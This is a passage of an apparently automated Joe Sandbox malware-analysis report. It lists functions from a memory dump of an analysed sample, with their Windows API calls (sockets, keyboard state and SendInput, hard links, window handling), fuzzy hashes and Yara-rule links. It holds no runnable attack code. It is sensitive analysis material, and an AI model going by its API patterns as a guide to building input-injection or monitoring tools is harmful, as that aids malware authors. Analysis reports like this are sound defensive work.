Instruction Fuzzy Hash: E65138B1608304AFC710EF24D886A9BBBE8FFC9754F40491DF59997291EB30E944CB92

Function 00951711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00951840

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 270730b653bf83b8e380395bd64646308fb2685b39d0d54120969e53c84efce1
Instruction ID: 6074434af5f188b401c5f97961e6de8c7eb7a68d2f61ee272232e58753976330
Opcode Fuzzy Hash: 270730b653bf83b8e380395bd64646308fb2685b39d0d54120969e53c84efce1
Instruction Fuzzy Hash: 89413731A00104ABDB30FBBF8C42F7F3AA8EF85331F240625FD18D61A1DA35484947A1

Function 00992533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0099255A
WSAGetLastError.WSOCK32 ref: 00992568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009925E7
WSAGetLastError.WSOCK32 ref: 009925F1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 84238a5ab4fbc31135a9d0e5f09919512df72609ab0130249cc3f8e72f04c501
Instruction ID: fdcc905ca1b855623f71e3941156c2310e3d623a45ba992cd32dceb1d8453b33
Opcode Fuzzy Hash: 84238a5ab4fbc31135a9d0e5f09919512df72609ab0130249cc3f8e72f04c501
Instruction Fuzzy Hash: 6341D374B00200AFE720AF24C886F6677E5AF94758F54C448F9568F6D2C771ED81CB90

Function 009A6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009A6D1A
ScreenToClient.USER32(?,?), ref: 009A6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009A6DBA

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b9daa95dc27d72946105b09d48e5cb18c4e7b58584bacbb4c1b002d07a2d4f4f
Instruction ID: b77984b1526a48877bbe9cf59be2e7a828fa358a442888e9ac10b3e63810dd3c
Opcode Fuzzy Hash: b9daa95dc27d72946105b09d48e5cb18c4e7b58584bacbb4c1b002d07a2d4f4f
Instruction Fuzzy Hash: A7516174A00209EFCF24DF64D880AAE7BBAFF45360F248159F9159B290D730ED91DB90

Function 0094B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698d6deab62b93fe91a7436243cbf9d30cad2629475f65a9c5cadd4a287c7a64
Instruction ID: 66a5f76ab255e2908c5d087b0e3bb3d693b49d06bdb5dff282260fe922394c55
Opcode Fuzzy Hash: 698d6deab62b93fe91a7436243cbf9d30cad2629475f65a9c5cadd4a287c7a64
Instruction Fuzzy Hash: 8541D272A00708AFD729AF78CC41FAABBEDEB88710F10852AF511DB391D771D9518B80

Function 0098611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009861C8
GetLastError.KERNEL32(?,00000000), ref: 009861EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00986213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0098623F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a1f805bea043f7ff0f287ab68faf07abeaf5609a6c74697f23f9fa7261410362
Instruction ID: bc682ebab63a73a7a0ad1cf9d72a783b50fddbb25e873e634f9634d263f27f69
Opcode Fuzzy Hash: a1f805bea043f7ff0f287ab68faf07abeaf5609a6c74697f23f9fa7261410362
Instruction Fuzzy Hash: 12412A35700615DFCB11EF14C549A5ABBE2EF8A710B198488E85AAF362CB34FD41DB91

Function 0094DC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009370E1,00000000,00000000,00938649,?,00938649,?,00000001,009370E1,8BE85006,00000001,00938649,00938649), ref: 0094DC90
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0094DD19
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0094DD2B
__freea.LIBCMT ref: 0094DD34

Part of subcall function 00943B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00936A79,?,0000015D,?,?,?,?,009385B0,000000FF,00000000,?,?), ref: 00943BC5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c418f712db108c0a14d064210e6d63e2911e633b44b4fed48e6f928fa4a76c50
Instruction ID: 8d5fb199c4bb18d0a7c0bf606fc81f405daaa1b81d779aceb093221b06aff390
Opcode Fuzzy Hash: c418f712db108c0a14d064210e6d63e2911e633b44b4fed48e6f928fa4a76c50
Instruction Fuzzy Hash: A931BC32A1120AABDF248F64DC85EAE7BA9EF81710F144528FC05D6290EB35DD51CBA0

Function 0097B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0097B473
SetKeyboardState.USER32(00000080), ref: 0097B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0097B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0097B54F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f4a16dc10fbc93f3eb0c43883f03f67071e15342efba0c05464ec0ba3ed953f3
Instruction ID: efe40613f42570b2a4fc3d070b2af069c89c52f505b4ba51b396ce9043e1db7d
Opcode Fuzzy Hash: f4a16dc10fbc93f3eb0c43883f03f67071e15342efba0c05464ec0ba3ed953f3
Instruction Fuzzy Hash: 15312D72A442086EFF30CB25C8057FE7B79AF99310F08C61AF59E961E2C37489459791

Function 0097B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0097B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 0097B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 0097B63B
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0097B68D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7385ba28bf223a5d67cbb8a843492c9762692d4997d0a4b5c891ab39def9669c
Instruction ID: a02809edaae93bb2b2bf6640d65a848e9e50c32a991d263abbc61d0ef53ff610
Opcode Fuzzy Hash: 7385ba28bf223a5d67cbb8a843492c9762692d4997d0a4b5c891ab39def9669c
Instruction Fuzzy Hash: 13310C32A40608AEFF308B6588057FE7BAAAF85330F04C62AE58D561D1C7748A559B91

Function 009A80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 009A80D4
GetWindowRect.USER32(?,?), ref: 009A814A
PtInRect.USER32(?,?,?), ref: 009A815A
MessageBeep.USER32(00000000), ref: 009A81C6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 2f7dc65af779245d5a403338c68b100fe839dcf1b9d6de04938da0a48877fc8f
Instruction ID: ce79c2e1ad7cec9306769dd716a7fed0a094eac69cc1580db0d95997f1a926d5
Opcode Fuzzy Hash: 2f7dc65af779245d5a403338c68b100fe839dcf1b9d6de04938da0a48877fc8f
Instruction Fuzzy Hash: 30419A30A09219DFCB11CF58C8C4AAABBF9FF4A314F1444A8E9559B261CB30EC42DBD0

Function 009A2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009A2187

Part of subcall function 00974393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009743AD
Part of subcall function 00974393: GetCurrentThreadId.KERNEL32 ref: 009743B4
Part of subcall function 00974393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00972F00), ref: 009743BB

GetCaretPos.USER32(?), ref: 009A219B
ClientToScreen.USER32(00000000,?), ref: 009A21E8
GetForegroundWindow.USER32 ref: 009A21EE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 135606023c0c33e9b0dde4328e3260aa4e6eba125acdff62e2ee9f70c10203c9
Instruction ID: fbfe5627c86fb1b39bafc76ae756de133a7758ce378488a944c8c9e57f5812b2
Opcode Fuzzy Hash: 135606023c0c33e9b0dde4328e3260aa4e6eba125acdff62e2ee9f70c10203c9
Instruction Fuzzy Hash: F53132B1E05109AFC704DFA9C8819EEB7FDEF89304B508469E415E7211D7759E45CBA0

Function 0097E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 009141EA: _wcslen.LIBCMT ref: 009141EF

_wcslen.LIBCMT ref: 0097E8E2
_wcslen.LIBCMT ref: 0097E8F9
_wcslen.LIBCMT ref: 0097E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0097E92F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 87e3b309d6e72aaea6eb2df3370158c24489c9a7510e6f3aee64fe93a20abcda
Instruction ID: 764189dbbaa810eaf71ac3a920bf0b473124743818d182bb45ee7471d1908152
Opcode Fuzzy Hash: 87e3b309d6e72aaea6eb2df3370158c24489c9a7510e6f3aee64fe93a20abcda
Instruction Fuzzy Hash: AD21BA72D01219EFCB119FA4D981BEEB7F8EF99350F1540A4F944BB241D6709E41CBA1

Function 009A9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

GetCursorPos.USER32(?), ref: 009A9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009A9A72
GetCursorPos.USER32(?), ref: 009A9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 009A9AF0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 23e896616d75b798b91217bc2fb873575d8968f451ecfd81d6be34f3edf34688
Instruction ID: 496cccf3ca12c44a5f531f7853aff58e6504e956071c63f0ddfa870e940e3ba1
Opcode Fuzzy Hash: 23e896616d75b798b91217bc2fb873575d8968f451ecfd81d6be34f3edf34688
Instruction Fuzzy Hash: 38219C35601018AFCF258F94C888EEA7BB9FF4A350F504166F9068B1A1D7759D50EBA0

Function 0097DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,009ADC30), ref: 0097DBA6
GetLastError.KERNEL32 ref: 0097DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 0097DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009ADC30), ref: 0097DC21

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2a7173af0a57de9719d54794fb9345c265af7146417d320062aa203318b2217a
Instruction ID: ab4fc22e7d75c68e3507a9bf8440d8cd96395227ca3ae66f5142d49f1b7c8cc9
Opcode Fuzzy Hash: 2a7173af0a57de9719d54794fb9345c265af7146417d320062aa203318b2217a
Instruction Fuzzy Hash: 5621A37110A2059F8700DF24C88199BBBF8EE96364F148A19F4EDC32A1DB30D946DB92

Function 009A321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 009A32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009A32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009A32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009A32DC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 402a5116ca05217540a1095fb3d48fa69cc43895f7ab7b39b190c4da5e202ecf
Instruction ID: 484c107c21c36942f396e777e93ea99791687a31f9b58292e6ab229b6fd73e02
Opcode Fuzzy Hash: 402a5116ca05217540a1095fb3d48fa69cc43895f7ab7b39b190c4da5e202ecf
Instruction Fuzzy Hash: EC21D031709115AFD7149F24C845FAABB99EF86324F24C258F8268B6D2C771EE81CBD0

Function 0097825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00978271,?,000000FF,?,009790BB,00000000,?,0000001C,?,?), ref: 009796F3
Part of subcall function 009796E4: lstrcpyW.KERNEL32(00000000,?,?,00978271,?,000000FF,?,009790BB,00000000,?,0000001C,?,?,00000000), ref: 00979719
Part of subcall function 009796E4: lstrcmpiW.KERNEL32(00000000,?,00978271,?,000000FF,?,009790BB,00000000,?,0000001C,?,?), ref: 0097974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009790BB,00000000,?,0000001C,?,?,00000000), ref: 0097828A
lstrcpyW.KERNEL32(00000000,?,?,009790BB,00000000,?,0000001C,?,?,00000000), ref: 009782B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,009790BB,00000000,?,0000001C,?,?,00000000), ref: 009782EB

Strings

cdecl, xrefs: 009782E2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 3c23fa95e5a0e0d119e6a71e10b3700e44f012a0a0be7eb35bb52c4f6ff5900b
Instruction ID: 3b64e9ae7dac717f024acbd8b12a8ea846c487c859f91f2532a34b93ae8dc4a8
Opcode Fuzzy Hash: 3c23fa95e5a0e0d119e6a71e10b3700e44f012a0a0be7eb35bb52c4f6ff5900b
Instruction Fuzzy Hash: 4C11D33B204241ABCB149F78D849E7B77A9FF85B90B50812AF946C72A0EF319811D790

Function 009A60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009A615A
_wcslen.LIBCMT ref: 009A616C
_wcslen.LIBCMT ref: 009A6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 009A62B5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 891457d2842576155e48ddd6996d3393ef7364aeec56e442221bb8a27b69f52a
Instruction ID: 1025965e0c0c5bd0e762c09aa3dce7f882febea32a6b2ce8361e56211085157f
Opcode Fuzzy Hash: 891457d2842576155e48ddd6996d3393ef7364aeec56e442221bb8a27b69f52a
Instruction Fuzzy Hash: 5511BE75604208AADF20DF659C84BEF7BACEF53364F14442AFA21D6081EB74C941DAE0

Function 00942079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4552b68406de25febc500bb9dea58309053c7b885924c50e3e714344ffd53cff
Instruction ID: 7d49dcfc253debf868aed17404c2d454029181eea252eaf80ed429aaba06c2c3
Opcode Fuzzy Hash: 4552b68406de25febc500bb9dea58309053c7b885924c50e3e714344ffd53cff
Instruction Fuzzy Hash: 5D01D1B261A2167EF6212B78ACC0F27678DFF823B8B700726F521A51D5EE708C80D160

Function 00972374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00972394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009723A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009723BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009723D7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9d861f05b76652f09648a240eb18e67a1a483c98893eeaa499e888d22ff502ee
Instruction ID: ca974817b730f3dbb41a3dd2aee4094281c6764debc1b0e3a974340f2beb5349
Opcode Fuzzy Hash: 9d861f05b76652f09648a240eb18e67a1a483c98893eeaa499e888d22ff502ee
